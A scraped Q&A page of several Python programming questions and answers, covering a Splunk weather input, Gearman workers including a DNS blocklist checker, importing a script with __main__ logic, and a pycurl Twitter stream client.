python calling apis events and printing randomly - python

I have a interval of 60 and wanted to print 6 events every 1 minutes. But it prints 11,12 and 13 events randomly every 1 minutes. Why is that so ? Is it because of my codes or what other factors can cause this ?
My code is -
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup
SCHEME = """<scheme>
<title>testingCurrentWeatherSG</title>
<description>Get data from forecast.</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>simple</streaming_mode>
<endpoint>
<args>
<arg name="intervalone">
<title>Intervalone</title>
<description>How long to refresh this query?</description>
</arg>
</args>
</endpoint>
</scheme>
"""
def do_scheme():
print SCHEME
## Utility functions
def fahrenheit(fahren):
return (fahren-32) * 5.0/9.0
def get_percent(num):
return num * 100.
## Responses
def get_response(conn, url):
try:
conn.request('GET', url)
result = conn.getresponse()
data = result.read()
return json.loads(data)
except socket.timeout:
return None
## Printing
def print_forecast(name, di):
# Print the forcast from 'di', for location 'name'
# name is the name of the location, di is the api response
psi_avg=20
current = di['currently']
for key, value in sorted(current.iteritems()):
if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity', # time
'precipProbability', 'precipType', 'pressure', 'summary',
'visibility', 'windBearing', 'windSpeed']:
print '{0} : {1}'.format(key, value)
elif key in ['temperature', 'dewPoint']:
print '%s: %.2f' % (key, fahrenheit(value))
elif key == 'humidity':
print '%s: %.2f' % (key, get_percent(value))
print 'psiAverage : ' + str(psi_avg)
print 'latitude : ' + str(di['latitude'])
print 'longitude : ' + str(di['longitude'])
print 'location : ' + str(name)
print
def weather_Connection(intervalone):
host = 'api.forecast.io'
conn = httplib.HTTPSConnection(host, timeout=60) # adjust timeout as desired
try:
urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
conn.request('GET', urlnyp)
resultnyp = conn.getresponse()
contentnyp = resultnyp.read()
except socket.timeout:
print 'socket timeout'
return
# the locations and urls for the api calls
urls = {
'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
}
responses = {}
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
conn.close()
# print the forecast
for name, data in responses.iteritems():
print_forecast(name, data)
def get_config():
#Read XML Configuration data passed from splunkd on stdin
config = {}
try:
# read everything from stdin
config_str = sys.stdin.read()
# parse the config XML
doc = xml.dom.minidom.parseString(config_str)
root = doc.documentElement
conf_node = root.getElementsByTagName("configuration")[0]
if conf_node:
logging.debug("XML: found configuration")
stanza = conf_node.getElementsByTagName("stanza")[0]
if stanza:
stanza_name = stanza.getAttribute("name")
if stanza_name:
logging.debug("XML: found stanza " + stanza_name)
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
param_name = param.getAttribute("name")
logging.debug("XML: found param '%s'" % param_name)
if param_name and param.firstChild and \
param.firstChild.nodeType == param.firstChild.TEXT_NODE:
data = param.firstChild.data
config[param_name] = data
logging.debug("XML: '%s' -> '%s'" % (param_name, data))
if not config:
raise Exception, "Invalid configuration received from Splunk."
except Exception, e:
raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
return config
def run():
#The Main function that starts the action. The thread will sleep for however many seconds are configured via the Input.
# config = get_config()
#
#
# intervalone = config["intervalone"]
intervalone =60
while True:
weather_Connection(intervalone)
logging.info("Sleeping for %s seconds" %(intervalone))
time.sleep(float(intervalone))
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] == "--scheme":
do_scheme()
else:
run()
sys.exit(0)

I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
Note: why returning from weather_Connection() here
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
You can just skip it with continue
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
continue
responses[name] = response

Related

Keep gearman worker in listening mode after loading file content

I want to keep some file content loaded in memory so that it can be queried in retrived instantly.
In gearman worker, I am loading the file and put it in listening mode. While making request using gearman client, worker returns loaded content only once, next time client receives None
worker :
class GetLexiconFiles(object):
def __init__(self):
self.gm_worker = gearman.GearmanWorker(['localhost:4730'])
self.loadFiles()
self.gm_worker.register_task('load_db', self.task_listener_reverse)
#self.loadFiles()
#self.gm_worker.work()
def task_listener_reverse(self, gearman_worker, gearman_job):
k=float('inf')
#print "Started loading file"
self.input_text = self.input_text.split('\n')
print "Loading completed"
lexicon = defaultdict(list)
for i, line in enumerate(self.input_text):
#print "line is : ", line
if i >= k: break
#if i % 100000 == 0: print >>sys.stderr, i
try:
if line != '':
nl, dbs = line.split(' ', 1)
nl = int(nl)
dbs = self.str2obj(dbs)
lexicon[nl].append(dbs)
else:
pass
except:
print >>sys.stderr, 'could not parse line %r' % line
print traceback.format_exc()
continue
return json.dumps(lexicon)
if __name__ == '__main__':
GetLexiconFiles().gm_worker.work()
client :
def check_request_status(job_request):
if job_request.complete:
#data = json.loads(job_request.result)
print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
elif job_request.timed_out:
print "Job %s timed out!"
elif job_request.state == JOB_UNKNOWN:
print "Job %s connection failed!"
gm_client = gearman.GearmanClient(['localhost:4730'])
tasks = [{'task': 'load_lexicon', 'data': 'This is testing sentence'}, {'task': 'load_db', 'data': 'This is db testing'}]
submitted_requests = gm_client.submit_multiple_jobs(tasks, background=False, wait_until_complete=False)
completed_requests = gm_client.wait_until_jobs_completed(submitted_requests)
print completed_requests[1].result
for completed_job_request in completed_requests:
check_request_status(completed_job_request)
self.input_text = self.input_text.split('\n')
With this line of code you are converting a string to a list of strings.
Since you save the result back in self.input_text the next time that that function gets called self.input_text will already be a list and it'll raise an exception.

import python with __main__ method

I have a python script that have __main__ statement and took all values parametric.
I want to import and use it in my own script.
Actually I can import but don't know how to use it.
As you see below, __main__ is a bit complicated and rewriting it will take time because I even don't know what does most of code mean.
Want to know is there any way to import and use the code as a function?
import os
import sys
import time
import base64
from urllib2 import urlopen
from urllib2 import Request
from urllib2 import HTTPError
from urllib import urlencode
from urllib import quote
from exceptions import Exception
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.application import MIMEApplication
from email.encoders import encode_noop
from api_util import json2python, python2json
class MalformedResponse(Exception):
pass
class RequestError(Exception):
pass
class Client(object):
default_url = 'http://nova.astrometry.net/api/'
def __init__(self,
apiurl = default_url):
self.session = None
self.apiurl = apiurl
def get_url(self, service):
return self.apiurl + service
def send_request(self, service, args={}, file_args=None):
'''
service: string
args: dict
'''
if self.session is not None:
args.update({ 'session' : self.session })
print 'Python:', args
json = python2json(args)
print 'Sending json:', json
url = self.get_url(service)
print 'Sending to URL:', url
# If we're sending a file, format a multipart/form-data
if file_args is not None:
m1 = MIMEBase('text', 'plain')
m1.add_header('Content-disposition', 'form-data; name="request-json"')
m1.set_payload(json)
m2 = MIMEApplication(file_args[1],'octet-stream',encode_noop)
m2.add_header('Content-disposition',
'form-data; name="file"; filename="%s"' % file_args[0])
#msg.add_header('Content-Disposition', 'attachment',
# filename='bud.gif')
#msg.add_header('Content-Disposition', 'attachment',
# filename=('iso-8859-1', '', 'FuSballer.ppt'))
mp = MIMEMultipart('form-data', None, [m1, m2])
# Makie a custom generator to format it the way we need.
from cStringIO import StringIO
from email.generator import Generator
class MyGenerator(Generator):
def __init__(self, fp, root=True):
Generator.__init__(self, fp, mangle_from_=False,
maxheaderlen=0)
self.root = root
def _write_headers(self, msg):
# We don't want to write the top-level headers;
# they go into Request(headers) instead.
if self.root:
return
# We need to use \r\n line-terminator, but Generator
# doesn't provide the flexibility to override, so we
# have to copy-n-paste-n-modify.
for h, v in msg.items():
print >> self._fp, ('%s: %s\r\n' % (h,v)),
# A blank line always separates headers from body
print >> self._fp, '\r\n',
# The _write_multipart method calls "clone" for the
# subparts. We hijack that, setting root=False
def clone(self, fp):
return MyGenerator(fp, root=False)
fp = StringIO()
g = MyGenerator(fp)
g.flatten(mp)
data = fp.getvalue()
headers = {'Content-type': mp.get('Content-type')}
if False:
print 'Sending headers:'
print ' ', headers
print 'Sending data:'
print data[:1024].replace('\n', '\\n\n').replace('\r', '\\r')
if len(data) > 1024:
print '...'
print data[-256:].replace('\n', '\\n\n').replace('\r', '\\r')
print
else:
# Else send x-www-form-encoded
data = {'request-json': json}
print 'Sending form data:', data
data = urlencode(data)
print 'Sending data:', data
headers = {}
request = Request(url=url, headers=headers, data=data)
try:
f = urlopen(request)
txt = f.read()
print 'Got json:', txt
result = json2python(txt)
print 'Got result:', result
stat = result.get('status')
print 'Got status:', stat
if stat == 'error':
errstr = result.get('errormessage', '(none)')
raise RequestError('server error message: ' + errstr)
return result
except HTTPError, e:
print 'HTTPError', e
txt = e.read()
open('err.html', 'wb').write(txt)
print 'Wrote error text to err.html'
def login(self, apikey):
args = { 'apikey' : apikey }
result = self.send_request('login', args)
sess = result.get('session')
print 'Got session:', sess
if not sess:
raise RequestError('no session in result')
self.session = sess
def _get_upload_args(self, **kwargs):
args = {}
for key,default,typ in [('allow_commercial_use', 'd', str),
('allow_modifications', 'd', str),
('publicly_visible', 'y', str),
('scale_units', None, str),
('scale_type', None, str),
('scale_lower', None, float),
('scale_upper', None, float),
('scale_est', None, float),
('scale_err', None, float),
('center_ra', None, float),
('center_dec', None, float),
('radius', None, float),
('downsample_factor', None, int),
('tweak_order', None, int),
('crpix_center', None, bool),
# image_width, image_height
]:
if key in kwargs:
val = kwargs.pop(key)
val = typ(val)
args.update({key: val})
elif default is not None:
args.update({key: default})
print 'Upload args:', args
return args
def url_upload(self, url, **kwargs):
args = dict(url=url)
args.update(self._get_upload_args(**kwargs))
result = self.send_request('url_upload', args)
return result
def upload(self, fn, **kwargs):
args = self._get_upload_args(**kwargs)
try:
f = open(fn, 'rb')
result = self.send_request('upload', args, (fn, f.read()))
return result
except IOError:
print 'File %s does not exist' % fn
raise
def submission_images(self, subid):
result = self.send_request('submission_images', {'subid':subid})
return result.get('image_ids')
def overlay_plot(self, service, outfn, wcsfn, wcsext=0):
from astrometry.util import util as anutil
wcs = anutil.Tan(wcsfn, wcsext)
params = dict(crval1 = wcs.crval[0], crval2 = wcs.crval[1],
crpix1 = wcs.crpix[0], crpix2 = wcs.crpix[1],
cd11 = wcs.cd[0], cd12 = wcs.cd[1],
cd21 = wcs.cd[2], cd22 = wcs.cd[3],
imagew = wcs.imagew, imageh = wcs.imageh)
result = self.send_request(service, {'wcs':params})
print 'Result status:', result['status']
plotdata = result['plot']
plotdata = base64.b64decode(plotdata)
open(outfn, 'wb').write(plotdata)
print 'Wrote', outfn
def sdss_plot(self, outfn, wcsfn, wcsext=0):
return self.overlay_plot('sdss_image_for_wcs', outfn,
wcsfn, wcsext)
def galex_plot(self, outfn, wcsfn, wcsext=0):
return self.overlay_plot('galex_image_for_wcs', outfn,
wcsfn, wcsext)
def myjobs(self):
result = self.send_request('myjobs/')
return result['jobs']
def job_status(self, job_id, justdict=False):
result = self.send_request('jobs/%s' % job_id)
if justdict:
return result
stat = result.get('status')
if stat == 'success':
result = self.send_request('jobs/%s/calibration' % job_id)
print 'Calibration:', result
result = self.send_request('jobs/%s/tags' % job_id)
print 'Tags:', result
result = self.send_request('jobs/%s/machine_tags' % job_id)
print 'Machine Tags:', result
result = self.send_request('jobs/%s/objects_in_field' % job_id)
print 'Objects in field:', result
result = self.send_request('jobs/%s/annotations' % job_id)
print 'Annotations:', result
result = self.send_request('jobs/%s/info' % job_id)
print 'Calibration:', result
return stat
def sub_status(self, sub_id, justdict=False):
result = self.send_request('submissions/%s' % sub_id)
if justdict:
return result
return result.get('status')
def jobs_by_tag(self, tag, exact):
exact_option = 'exact=yes' if exact else ''
result = self.send_request(
'jobs_by_tag?query=%s&%s' % (quote(tag.strip()), exact_option),
{},
)
return result
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser()
parser.add_option('--server', dest='server', default=Client.default_url,
help='Set server base URL (eg, %default)')
parser.add_option('--apikey', '-k', dest='apikey',
help='API key for Astrometry.net web service; if not given will check AN_API_KEY environment variable')
parser.add_option('--upload', '-u', dest='upload', help='Upload a file')
parser.add_option('--wait', '-w', dest='wait', action='store_true', help='After submitting, monitor job status')
parser.add_option('--wcs', dest='wcs', help='Download resulting wcs.fits file, saving to given filename; implies --wait if --urlupload or --upload')
parser.add_option('--kmz', dest='kmz', help='Download resulting kmz file, saving to given filename; implies --wait if --urlupload or --upload')
parser.add_option('--urlupload', '-U', dest='upload_url', help='Upload a file at specified url')
parser.add_option('--scale-units', dest='scale_units',
choices=('arcsecperpix', 'arcminwidth', 'degwidth', 'focalmm'), help='Units for scale estimate')
#parser.add_option('--scale-type', dest='scale_type',
# choices=('ul', 'ev'), help='Scale bounds: lower/upper or estimate/error')
parser.add_option('--scale-lower', dest='scale_lower', type=float, help='Scale lower-bound')
parser.add_option('--scale-upper', dest='scale_upper', type=float, help='Scale upper-bound')
parser.add_option('--scale-est', dest='scale_est', type=float, help='Scale estimate')
parser.add_option('--scale-err', dest='scale_err', type=float, help='Scale estimate error (in PERCENT), eg "10" if you estimate can be off by 10%')
parser.add_option('--ra', dest='center_ra', type=float, help='RA center')
parser.add_option('--dec', dest='center_dec', type=float, help='Dec center')
parser.add_option('--radius', dest='radius', type=float, help='Search radius around RA,Dec center')
parser.add_option('--downsample', dest='downsample_factor', type=int, help='Downsample image by this factor')
parser.add_option('--parity', dest='parity', choices=('0','1'), help='Parity (flip) of image')
parser.add_option('--tweak-order', dest='tweak_order', type=int, help='SIP distortion order (default: 2)')
parser.add_option('--crpix-center', dest='crpix_center', action='store_true', default=None, help='Set reference point to center of image?')
parser.add_option('--sdss', dest='sdss_wcs', nargs=2, help='Plot SDSS image for the given WCS file; write plot to given PNG filename')
parser.add_option('--galex', dest='galex_wcs', nargs=2, help='Plot GALEX image for the given WCS file; write plot to given PNG filename')
parser.add_option('--substatus', '-s', dest='sub_id', help='Get status of a submission')
parser.add_option('--jobstatus', '-j', dest='job_id', help='Get status of a job')
parser.add_option('--jobs', '-J', dest='myjobs', action='store_true', help='Get all my jobs')
parser.add_option('--jobsbyexacttag', '-T', dest='jobs_by_exact_tag', help='Get a list of jobs associated with a given tag--exact match')
parser.add_option('--jobsbytag', '-t', dest='jobs_by_tag', help='Get a list of jobs associated with a given tag')
parser.add_option( '--private', '-p',
dest='public',
action='store_const',
const='n',
default='y',
help='Hide this submission from other users')
parser.add_option('--allow_mod_sa','-m',
dest='allow_mod',
action='store_const',
const='sa',
default='d',
help='Select license to allow derivative works of submission, but only if shared under same conditions of original license')
parser.add_option('--no_mod','-M',
dest='allow_mod',
action='store_const',
const='n',
default='d',
help='Select license to disallow derivative works of submission')
parser.add_option('--no_commercial','-c',
dest='allow_commercial',
action='store_const',
const='n',
default='d',
help='Select license to disallow commercial use of submission')
opt,args = parser.parse_args()
if opt.apikey is None:
# try the environment
opt.apikey = os.environ.get('AN_API_KEY', None)
if opt.apikey is None:
parser.print_help()
print
print 'You must either specify --apikey or set AN_API_KEY'
sys.exit(-1)
args = {}
args['apiurl'] = opt.server
c = Client(**args)
c.login(opt.apikey)
if opt.upload or opt.upload_url:
if opt.wcs or opt.kmz:
opt.wait = True
kwargs = dict(
allow_commercial_use=opt.allow_commercial,
allow_modifications=opt.allow_mod,
publicly_visible=opt.public)
if opt.scale_lower and opt.scale_upper:
kwargs.update(scale_lower=opt.scale_lower,
scale_upper=opt.scale_upper,
scale_type='ul')
elif opt.scale_est and opt.scale_err:
kwargs.update(scale_est=opt.scale_est,
scale_err=opt.scale_err,
scale_type='ev')
elif opt.scale_lower or opt.scale_upper:
kwargs.update(scale_type='ul')
if opt.scale_lower:
kwargs.update(scale_lower=opt.scale_lower)
if opt.scale_upper:
kwargs.update(scale_upper=opt.scale_upper)
for key in ['scale_units', 'center_ra', 'center_dec', 'radius',
'downsample_factor', 'tweak_order', 'crpix_center',]:
if getattr(opt, key) is not None:
kwargs[key] = getattr(opt, key)
if opt.parity is not None:
kwargs.update(parity=int(opt.parity))
if opt.upload:
upres = c.upload(opt.upload, **kwargs)
if opt.upload_url:
upres = c.url_upload(opt.upload_url, **kwargs)
stat = upres['status']
if stat != 'success':
print 'Upload failed: status', stat
print upres
sys.exit(-1)
opt.sub_id = upres['subid']
if opt.wait:
if opt.job_id is None:
if opt.sub_id is None:
print "Can't --wait without a submission id or job id!"
sys.exit(-1)
while True:
stat = c.sub_status(opt.sub_id, justdict=True)
print 'Got status:', stat
jobs = stat.get('jobs', [])
if len(jobs):
for j in jobs:
if j is not None:
break
if j is not None:
print 'Selecting job id', j
opt.job_id = j
break
time.sleep(5)
success = False
while True:
stat = c.job_status(opt.job_id, justdict=True)
print 'Got job status:', stat
if stat.get('status','') in ['success']:
success = (stat['status'] == 'success')
break
time.sleep(5)
if success:
c.job_status(opt.job_id)
# result = c.send_request('jobs/%s/calibration' % opt.job_id)
# print 'Calibration:', result
# result = c.send_request('jobs/%s/tags' % opt.job_id)
# print 'Tags:', result
# result = c.send_request('jobs/%s/machine_tags' % opt.job_id)
# print 'Machine Tags:', result
# result = c.send_request('jobs/%s/objects_in_field' % opt.job_id)
# print 'Objects in field:', result
#result = c.send_request('jobs/%s/annotations' % opt.job_id)
#print 'Annotations:', result
retrieveurls = []
if opt.wcs:
# We don't need the API for this, just construct URL
url = opt.server.replace('/api/', '/wcs_file/%i' % opt.job_id)
retrieveurls.append((url, opt.wcs))
if opt.kmz:
url = opt.server.replace('/api/', '/kml_file/%i/' % opt.job_id)
retrieveurls.append((url, opt.kmz))
for url,fn in retrieveurls:
print 'Retrieving file from', url, 'to', fn
f = urlopen(url)
txt = f.read()
w = open(fn, 'wb')
w.write(txt)
w.close()
print 'Wrote to', fn
opt.job_id = None
opt.sub_id = None
if opt.sdss_wcs:
(wcsfn, outfn) = opt.sdss_wcs
c.sdss_plot(outfn, wcsfn)
if opt.galex_wcs:
(wcsfn, outfn) = opt.galex_wcs
c.galex_plot(outfn, wcsfn)
if opt.sub_id:
print c.sub_status(opt.sub_id)
if opt.job_id:
print c.job_status(opt.job_id)
#result = c.send_request('jobs/%s/annotations' % opt.job_id)
#print 'Annotations:', result
if opt.jobs_by_tag:
tag = opt.jobs_by_tag
print c.jobs_by_tag(tag, None)
if opt.jobs_by_exact_tag:
tag = opt.jobs_by_exact_tag
print c.jobs_by_tag(tag, 'yes')
if opt.myjobs:
jobs = c.myjobs()
print jobs
#print c.submission_images(1)
No, there is no clean way to do so. When the module is being imported, it's code is executed and all global variables are set as attributes to the module object. So if part of the code is not executed at all (is guarded by __main__ condition) there is no clean way to get access to that code. You can however run code of this module with substituted __name__ but that's very hackish.
You should refactor this module and move whole __main__ part into a method and call it like this:
def main():
do_everything()
if __name__ == '__main__':
main()
This way consumer apps will be able to run code without having to run it in a separate process.
Use the runpy module in the Python 3 Standard Library
See that data can be passed to and from the called script
# top.py
import runpy
import sys
sys.argv += ["another parameter"]
module_globals_dict = runpy.run_path("other_script.py",
init_globals = globals(), run_name="__main__")
print(module_globals_dict["return_value"])
# other_script.py
# Note we did not load sys module, it gets passed to this script
script_name = sys.argv[0]
print(f"Script {script_name} loaded")
if __name__ == "__main__":
params = sys.argv[1:]
print(f"Script {script_name} run with params: {params}")
return_value = f"{script_name} Done"
by what your saying you want to call a function in the script that is importing the module so try:
import __main__
__main__.myfunc()

Pass array into class in Python

I'm a php guy and I don't understand python very well... so .. excuse me if my question is stupid.
I have 2 php scripts (client.php and worker.php) using Gearman, that I need to convert to python versions. I have been able to do it partially, but I'm stuck. First, here are my two scripts:
client.py
#!/usr/bin/env python
import gearman
import json
RBLS = [
'b.barracudacentral.org',
'bl.emailbasura.org'
]
IP = '1.2.3.4'
def check_request_status(job_request):
if job_request.complete:
print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
elif job_request.timed_out:
print "Job %s timed out!" % job_request.unique
elif job_request.state == JOB_UNKNOWN:
print "Job %s connection failed!" % job_request.unique
data = {"ip": IP, "rbls": RBLS}
serialized_data = json.dumps(data)
gm_client = gearman.GearmanClient(['localhost:4730'])
completed_job_request = gm_client.submit_job("runcheck", serialized_data)
check_request_status(completed_job_request)
worker.py
#!/usr/bin/env python
import gearman
import sys
import socket
import re
import json
from dns.resolver import Resolver, NXDOMAIN, NoNameservers, Timeout, NoAnswer
from threading import Thread
# This hardcoded RBLS need to be passed by gearman client script
# RBLS = ['xbl.spamhaus.org', 'zen.spamhaus.org']
class Lookup(Thread):
def __init__(self, host, dnslist, listed, resolver):
Thread.__init__(self)
self.host = host
self.listed = listed
self.dnslist = dnslist
self.resolver = resolver
def run(self):
try:
host_record = self.resolver.query(self.host, "A")
if len(host_record) > 0:
self.listed[self.dnslist]['LISTED'] = True
self.listed[self.dnslist]['HOST'] = host_record[0].address
text_record = self.resolver.query(self.host, "TXT")
if len(text_record) > 0:
self.listed[self.dnslist]['TEXT'] = "\n".join(text_record[0].strings)
self.listed[self.dnslist]['ERROR'] = False
except NXDOMAIN:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NXDOMAIN
except NoNameservers:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoNameservers
except Timeout:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = Timeout
except NameError:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NameError
except NoAnswer:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoAnswer
class RBLSearch(object):
def __init__(self, lookup_host):
self.lookup_host = lookup_host
self._listed = None
self.resolver = Resolver()
self.resolver.timeout = 0.2
self.resolver.lifetime = 1.0
def search(self):
if self._listed is not None:
pass
else:
host = self.lookup_host.split(".")
host = ".".join(list(reversed(host)))
self._listed = {'SEARCH_HOST': self.lookup_host}
threads = []
for LIST in RBLS:
self._listed[LIST] = {'LISTED': False}
query = Lookup("%s.%s" % (host, LIST), LIST, self._listed, self.resolver)
threads.append(query)
query.start()
for thread in threads:
thread.join()
return self._listed
listed = property(search)
def print_results(self):
listed = self.listed
print("")
print("--- DNSBL Report for %s ---" % listed['SEARCH_HOST'])
for key in listed:
if key == 'SEARCH_HOST':
continue
if not listed[key].get('ERROR'):
if listed[key]['LISTED']:
print("Results for %s: %s" % (key, listed[key]['LISTED']))
print(" + Host information: %s" % \
(listed[key]['HOST']))
if 'TEXT' in listed[key].keys():
print(" + Additional information: %s" % \
(listed[key]['TEXT']))
else:
#print "*** Error contacting %s ***" % key
pass
def task_listener_runcheck(gearman_worker, gearman_job):
jdata = json.loads(gearman_job.data)
host = jdata['ip']
ip = host
RBLS = jdata['rbls']
print("Looking up: %s (please wait)" % host)
pat = re.compile("\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}")
is_ip_address = pat.match(host)
if not is_ip_address:
try:
ip = socket.gethostbyname(host)
print("Hostname %s resolved to ip %s" % (host,ip))
except socket.error:
print("Hostname %s can't be resolved" % host)
ip = ""
if ip:
searcher = RBLSearch(ip)
searcher.print_results()
return "RunCheck was successfull"
gm_worker = gearman.GearmanWorker(['localhost:4730'])
gm_worker.set_client_id('python-worker')
gm_worker.register_task('runcheck', task_listener_runcheck)
gm_worker.work()
Here is how this 2 scripts are working: client.py passes the IP address and array of rbl's to the worker.py. Then worker gets the IP address and check it against all the rbl's.
The problem is that I don't know how to use the RBLS inside the RBLSearch class. It's working if I hardcode the RBLS in the beginning of the script (See worker.py, Line 12), but it's not working if I define RBLS in task_listener_runcheck
I have been able to solve it. Here is the edited version (in case anyone want it):
worker.py
#!/usr/bin/env python
import gearman
import sys
import socket
import re
import json
from dns.resolver import Resolver, NXDOMAIN, NoNameservers, Timeout, NoAnswer
from threading import Thread
class Lookup(Thread):
def __init__(self, host, dnslist, listed, resolver):
Thread.__init__(self)
self.host = host
self.listed = listed
self.dnslist = dnslist
self.resolver = resolver
def run(self):
try:
host_record = self.resolver.query(self.host, "A")
if len(host_record) > 0:
self.listed[self.dnslist]['LISTED'] = True
self.listed[self.dnslist]['HOST'] = host_record[0].address
text_record = self.resolver.query(self.host, "TXT")
if len(text_record) > 0:
self.listed[self.dnslist]['TEXT'] = "\n".join(text_record[0].strings)
self.listed[self.dnslist]['ERROR'] = False
except NXDOMAIN:
self.listed[self.dnslist]['ERROR'] = False
self.listed[self.dnslist]['ERRORTYPE'] = NXDOMAIN
except NoNameservers:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoNameservers
self.listed[self.dnslist]['TEXT'] = "%s - The operation timed out." % self.host
except Timeout:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = Timeout
self.listed[self.dnslist]['TEXT'] = "%s - The operation timed out." % self.host
except NameError:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NameError
self.listed[self.dnslist]['TEXT'] = "%s - NameError" % self.host
except NoAnswer:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoAnswer
self.listed[self.dnslist]['TEXT'] = "%s - The response did not contain an answer to the question." % self.host
class RBLSearch(object):
def __init__(self, lookup_host, rbls):
self.lookup_host = lookup_host
self.rbls = rbls
self._listed = None
self.resolver = Resolver()
self.resolver.timeout = 0.2
self.resolver.lifetime = 1.0
def search(self):
if self._listed is not None:
pass
else:
host = self.lookup_host.split(".")
host = ".".join(list(reversed(host)))
self._listed = {'SEARCH_HOST': self.lookup_host}
threads = []
for LIST in self.rbls:
self._listed[LIST] = {'LISTED': False}
query = Lookup("%s.%s" % (host, LIST), LIST, self._listed, self.resolver)
threads.append(query)
query.start()
for thread in threads:
thread.join()
return self._listed
listed = property(search)
def print_results(self):
listed = self.listed
print("")
print("--- DNSBL Report for %s ---" % listed['SEARCH_HOST'])
for key in listed:
if key == 'SEARCH_HOST':
continue
if not listed[key].get('ERROR'):
if listed[key]['LISTED']:
print("Results for %s: %s" % (key, listed[key]['LISTED']))
print(" + Host information: %s" % \
(listed[key]['HOST']))
if 'TEXT' in listed[key].keys():
print(" + Additional information: %s" % \
(listed[key]['TEXT']))
else:
print("Not listed in %s" % (key))
else:
#print "*** Error contacting %s ***" % key
pass
def task_listener_runcheck(gearman_worker, gearman_job):
jdata = json.loads(gearman_job.data)
host = jdata['ip']
rbls = jdata['rbls']
ip = host
print("Looking up: %s (please wait)" % host)
pat = re.compile("\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}")
is_ip_address = pat.match(host)
if not is_ip_address:
try:
ip = socket.gethostbyname(host)
print("Hostname %s resolved to ip %s" % (host,ip))
except socket.error:
print("Hostname %s can't be resolved" % host)
ip = ""
if ip:
searcher = RBLSearch(ip, rbls)
searcher.print_results()
return "RunCheck was successfull"
gm_worker = gearman.GearmanWorker(['localhost:4730'])
gm_worker.set_client_id('python-worker')
gm_worker.register_task('runcheck', task_listener_runcheck)
gm_worker.work()

Searching for keywords with pycurl Python is stuck at Shell reverting nothing

I am trying to get tweets related to the keyword in the code But at the python shell there is nothing its just curson only No traceback nothing.The code is here
import time
import pycurl
import urllib
import json
import oauth2 as oauth
API_ENDPOINT_URL = 'https://stream.twitter.com/1.1/statuses/filter.json'
USER_AGENT = 'TwitterStream 1.0' # This can be anything really
# You need to replace these with your own values
OAUTH_KEYS = {'consumer_key': 'ABC',
'consumer_secret': 'ABC',
'access_token_key': 'ABC',
'access_token_secret': 'ABC'}
# These values are posted when setting up the connection
POST_PARAMS = {'include_entities': 0,
'stall_warning': 'true',
'track': 'iphone,ipad,ipod'}
class TwitterStream:
def __init__(self, timeout=False):
self.oauth_token = oauth.Token(key=OAUTH_KEYS['access_token_key'], secret=OAUTH_KEYS['access_token_secret'])
self.oauth_consumer = oauth.Consumer(key=OAUTH_KEYS['consumer_key'], secret=OAUTH_KEYS['consumer_secret'])
self.conn = None
self.buffer = ''
self.timeout = timeout
self.setup_connection()
def setup_connection(self):
""" Create persistant HTTP connection to Streaming API endpoint using cURL.
"""
if self.conn:
self.conn.close()
self.buffer = ''
self.conn = pycurl.Curl()
# Restart connection if less than 1 byte/s is received during "timeout" seconds
if isinstance(self.timeout, int):
self.conn.setopt(pycurl.LOW_SPEED_LIMIT, 1)
self.conn.setopt(pycurl.LOW_SPEED_TIME, self.timeout)
self.conn.setopt(pycurl.URL, API_ENDPOINT_URL)
self.conn.setopt(pycurl.USERAGENT, USER_AGENT)
# Using gzip is optional but saves us bandwidth.
self.conn.setopt(pycurl.ENCODING, 'deflate, gzip')
self.conn.setopt(pycurl.POST, 1)
self.conn.setopt(pycurl.POSTFIELDS, urllib.urlencode(POST_PARAMS))
self.conn.setopt(pycurl.HTTPHEADER, ['Host: stream.twitter.com',
'Authorization: %s' % self.get_oauth_header()])
# self.handle_tweet is the method that are called when new tweets arrive
